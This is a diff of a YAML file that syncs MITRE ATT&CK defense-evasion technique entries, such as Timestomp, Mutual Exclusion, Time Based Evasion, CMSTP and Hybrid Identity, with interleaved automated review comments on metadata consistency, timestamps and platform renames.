+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests: []
T1620:
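Review bot: in the expanded Timestomp description there is no blank line between the paragraph ending `...modifying times on both attributes simultaneously.(Citation: Double Timestomping)` and the following line `Timestomping may be used along with file name [Masquerading]...`, whereas every other paragraph in the block is separated by one; in Markdown those two will render as a single paragraph. The `Double Timestomping` reference description also carries a doubled period (`Stay sharp out there.. Retrieved`). Both look like upstream artifacts but are cheap to fix here. As with T1556.002, `x_mitre_permissions_required` (`root`, `SYSTEM`, `User`) is dropped without replacement, while the added data sources (`Process: OS API Execution`, `Command: Command Execution`) match the new `$SI`/`$FN` discussion.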
@@ -4134,9 +4219,76 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests: []
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
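Review bot: the new T1480.002 entry ends with `atomic_tests: []` and carries no `identifier:` key, while the neighbouring T1497.003 and T1218.003 entries in this file put `identifier: <technique id>` immediately before `atomic_tests`; any consumer that keys on `identifier` will skip the new technique. The file already mixes both conventions (T1564.011 above has none either), so the generator should settle on one and apply it to every entry. Two smaller points in the same block: `x_mitre_detection: ''` is empty even though two data sources ('Process: OS API Execution', 'File: File Creation') are listed, and the third contributor line uses an en dash ("Nagahama Hiroki – NEC Corporation Japan") where the other two use a comma.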
@@ -4200,57 +4352,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
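Review bot: most of this hunk is not a content change but a key reorder: the T1497.003 `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`/`type`/`created` and the whole `external_references` list are deleted here and re-added, in a different position and order, by the following hunks of the same file. That churn hides the real changes (the `modified` bump, the `/edit` suffix on the Deloitte URL) in review. Emitting keys in a fixed order from the generator would keep future syncs to a few-line diff.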
@@ -4265,6 +4370,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
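Review bot: the Deloitte Environment Awareness reference changes from `https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc` to the same id with an `/edit` suffix and a new retrieval date. Confirm the `/edit` form resolves for readers without edit rights on the shared file; the previous, suffix-less form was the plain file link. The rest of the re-added reference list is identical to the removed one apart from ordering.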
@@ -4338,8 +4490,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests: []
T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests: []
T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
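Review bot: the `modified` timestamp for T1218.002 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-03-11T19:01:55.821Z`; the same regression appears in this diff for T1599.001 (2021-04-29 to 2020-10-21), T1553.003 (2022-05-24 to 2022-05-05), T1207 (2022-05-11 to 2022-03-08), T1553.006 (2022-05-24 to 2022-05-05), T1574.006 (2023-05-09 to 2023-03-30) and T1222 (2022-11-08 to 2022-10-19). Together with the removal of `spec_version: '2.1'` from every entry this looks like a change of upstream bundle rather than edits to these objects; say so in the change description, because any consumer that treats a newer `modified` value as "technique updated" will not notice these entries.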
@@ -4559,8 +4709,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests: []
T1599.001:
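Review bot: for T1218.002 the hunk removes `x_mitre_attack_spec_version: 2.1.0` without adding a replacement, so the entry now has no ATT&CK spec version at all, whereas T1497.003 and T1218.003 above are bumped to `3.2.0`. T1599.001 and T1207 lose the key the same way later in this diff. Check whether the upstream objects really omit the field or whether the generator dropped it along with `spec_version`, and either restore it or document that the key is optional for downstream tooling.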
@@ -4583,7 +4731,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
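Review bot: the T1550 platform list drops `Office 365` and `Google Workspace` and adds `Identity Provider` and `Office Suite`, with the version bumped from 1.3 to 1.4; T1556.007 (also losing `Azure AD`) and T1078.001 get the same rename further down. Any downstream filter or per-platform index that still selects on the old strings will no longer return these techniques, so the rename deserves a line in the change description and a check that derived per-platform outputs were regenerated in the same commit.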
@@ -4702,18 +4849,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests: []
T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -4905,9 +5049,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -4970,9 +5115,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests: []
T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests: []
T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -5482,7 +5618,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
